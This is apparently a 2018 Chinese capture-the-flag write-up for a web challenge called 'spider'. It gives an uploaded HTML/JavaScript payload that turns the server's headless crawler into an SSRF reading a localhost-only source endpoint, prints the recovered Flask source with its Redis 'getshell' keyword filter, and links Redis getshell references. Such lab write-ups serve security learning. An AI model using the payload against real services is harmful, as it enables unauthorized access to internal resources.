[web]spider-jaivy xp0int Posted on Aug 25 2018 ## spider(web)-jaivy 动态爬虫,Redis Getshell。8000端口存在apache2 http://3d0666de57964c4b865e02e4088a14ac5b0522f7daa94075.game.ichunqiu.com/ [图片1]  扫描目录发现robots.txt,发现了目录get_sourcecode 访问  修改http头也没有效果 最后发现是xss+ssrf可以读取到源码,读文件脚本 上传4.html ``` <html> <head></head> <body> <script> var url="http://127.0.0.1/get_sourcecode"; var aaa = new XMLHttpRequest(); aaa.open("GET",url,false); aaa.onreadystatechange = function(){ if(aaa.readyState == 4){ var a = document.createElement("a"); a.innerHTML = aaa.responseText; document.body.appendChild(a); } } aaa.send(); </script> </body> </html> ``` 可以读取到源码  得到源码 ``` #!/usr/bin/env python # -*- encoding: utf-8 -*- from flask import Flask, request from flask import render_template import os import uuid import tempfile import subprocess import time import json app = Flask(__name__ , static_url_path='') def proc_shell(cmd): out_temp = tempfile.SpooledTemporaryFile(bufsize=1000*1000) fileno = out_temp.fileno() proc = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=fileno, shell=False) start_time = time.time() while True: if proc.poll() == None: if time.time() - start_time > 30: proc.terminate() proc.kill() proc.communicate() out_temp.seek(0) out_temp.close() return else: time.sleep(1) else: proc.communicate() out_temp.seek(0) data = out_temp.read() out_temp.close() return data def casperjs_html(url): cmd = 'casperjs {0} --ignore-ssl-errors=yes --url={1}'.format(os.path.dirname(__file__) + '/casper/casp.js' ,url) cmd = cmd.split(' ') stdout = proc_shell(cmd) try: result = json.loads(stdout) links = result.get('resourceRequestUrls') return links except Exception, e: return [] @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'GET': return render_template('index.html') else: f = request.files['file'] filename = str(uuid.uuid1()) + '.html' basepath = os.path.dirname(__file__) upload_path = os.path.join(basepath, 'static/upload/', filename) content = f.read() #hint if 'level=low_273eac1c' not in content and 'dbfilename' in content.lower(): return render_template('index.html', msg=u'Warning: 发现恶意关键字') #hint with open(upload_path, 'w') as f: f.write(content) url = 'http://127.0.0.1:80/upload/'+filename links = casperjs_html(url) links = '\n'.join(links) if not links: links = 'NULL' links = 'URL: '+url+'\n'+links return render_template('index.html', links=links) @app.route('/get_sourcecode', methods=['GET', 'POST']) def get_code(): if request.method == 'GET': ip = request.remote_addr if ip != '127.0.0.1': return 'NOT 127.0.0.1' else: with open(os.path.dirname(__file__)+'/run.py') as f: code = f.read() return code else: return '' @app.errorhandler(404) def page_not_found(error): return '404' @app.errorhandler(500) def internal_server_error(error): return '500' @app.errorhandler(403) def unauthorized(error): return '403' if __name__ == '__main__': pass ``` 做题时参考的文章链接 https://strcpy.me/index.php/archives/751/ https://zhuanlan.zhihu.com/p/36529010 https://www.anquanke.com/post/id/156377 https://lorexxar.cn/2016/12/03/redis-getshell/ https://xz.aliyun.com/t/1800 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Rev]beijing-MF [Rev]advanced-sherlly
没有帐号? 立即注册